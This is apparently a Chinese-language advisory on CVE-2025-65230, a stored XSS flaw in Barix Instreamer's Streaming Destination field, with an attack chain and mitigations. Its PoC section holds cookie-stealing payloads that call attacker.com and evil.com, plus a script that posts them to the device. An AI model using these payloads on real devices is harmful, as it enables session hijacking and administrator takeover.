CVE-2025-65230: Barix Instreamer Web UI存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-65230

漏洞类型

存储型跨站脚本（XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Barix Instreamer

漏洞概述

CVE-2025-65230是Barix Instreamer设备中发现的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞影响Instrema v04.06和v04.05版本。Barix Instreamer是一款专业的网络音频流设备，广泛应用于广播、语音报警、公共广播系统等专业音频传输场景。

该漏洞存在于设备的Web UI配置界面中，具体位于Streaming Destination（流媒体目标）输入字段。由于应用程序未能对用户输入进行充分的输入验证和输出编码，攻击者可以在Streaming Destination字段中注入恶意JavaScript代码。这些恶意代码会被存储在设备配置中，当其他用户（如管理员）访问相关配置页面或触发特定功能时，注入的恶意脚本将在受害者浏览器中执行。

攻击者利用此漏洞可以窃取管理员会话Cookie、劫持用户会话、修改页面内容显示钓鱼信息，或在管理员权限下执行进一步的攻击操作。由于该设备通常用于专业音视频传输环境，攻击者还可能利用存储的XSS漏洞进行内网横向移动或获取更高权限。由于需要低权限认证且需要用户交互，该漏洞的CVSS评分为5.4（中危）。

技术细节

漏洞位于Barix Instreamer Web管理界面的Streaming Destination配置功能模块。攻击者通过以下方式利用：

1. 认证到设备Web UI（低权限账户即可）
2. 导航至Streaming Destination配置页面
3. 在目标地址字段中注入恶意JavaScript payload，如：
<script>alert(document.cookie)</script>
4. 保存配置，恶意代码被持久化存储

当管理员查看该配置或相关页面时，浏览器会解析并执行存储的恶意脚本。由于缺乏输入过滤和输出编码，特殊字符和HTML标签被直接写入页面源代码。

攻击者可通过XSS获取：
- 管理员Cookie和会话令牌
- 页面内容中的敏感信息
- 发起针对管理员的进一步攻击

设备固件未实现Content Security Policy（CSP），且未对用户输入进行HTML实体编码，导致存储型XSS漏洞存在。攻击者可通过CSRF结合XSS提高攻击成功率。

攻击链分析

STEP 1

步骤1

攻击者获取Barix Instreamer设备访问权限，使用低权限账户登录Web管理界面

STEP 2

步骤2

导航至Streaming Destination配置页面（通常在Configuration > Streaming或类似路径）

STEP 3

步骤3

在Streaming Destination输入字段中注入包含恶意JavaScript代码的payload

STEP 4

步骤4

保存配置，恶意代码被持久化存储在设备配置中，不会被过滤或转义

STEP 5

步骤5

当管理员或具有高权限的用户访问同一配置页面时，浏览器解析并执行存储的恶意脚本

STEP 6

步骤6

恶意脚本窃取管理员Cookie、会话令牌或执行其他恶意操作，攻击者获取管理员权限

STEP 7

步骤7

攻击者可进一步利用获取的权限修改设备配置、窃取敏感数据或发起内网攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-65230 Stored XSS PoC for Barix Instreamer
// Target: Streaming Destination Configuration Field

// PoC Payload - Stored XSS
const xssPayload = '<script>\n  // Steal cookies and send to attacker server
  fetch("https://attacker.com/collect?c=" + btoa(document.cookie));
</script>';

// Alternative payload - Session Hijacking
const sessionHijackPayload = '<img src=x onerror="\n  document.location='https://evil.com/log?cookie='+document.cookie;
">';

// PoC Steps:
// 1. Login to Barix Instreamer Web UI
// 2. Navigate to: Configuration > Streaming > Destination
// 3. Inject payload in "Streaming Destination" or "Target Address" field
// 4. Save configuration
// 5. When admin views the page, XSS payload executes

// Example using fetch API for testing:
async function testXSS() {
    const target = 'http://<target-ip>/cgi-bin/config.cgi';
    const data = new URLSearchParams();
    data.append('stream_dest', xssPayload);
    data.append('action', 'save');
    
    // Send authenticated request
    await fetch(target, {
        method: 'POST',
        body: data,
        credentials: 'include'
    });
}

console.log('CVE-2025-65230 Stored XSS Payload:');
console.log(xssPayload);

影响范围

Barix Instreamer v04.05

Barix Instreamer v04.06

防御指南

临时缓解措施

在厂商发布官方修复补丁前，可采取以下临时缓解措施：1）限制设备的Web管理界面访问，仅允许受信任的IP地址访问；2）使用强密码策略并定期更换凭证；3）监控Web访问日志，检测异常的JavaScript代码注入行为；4）考虑使用VPN或防火墙隔离管理网络；5）如果Web UI不是必需功能，可考虑禁用；6）对管理员进行安全意识培训，提醒不要点击可疑链接。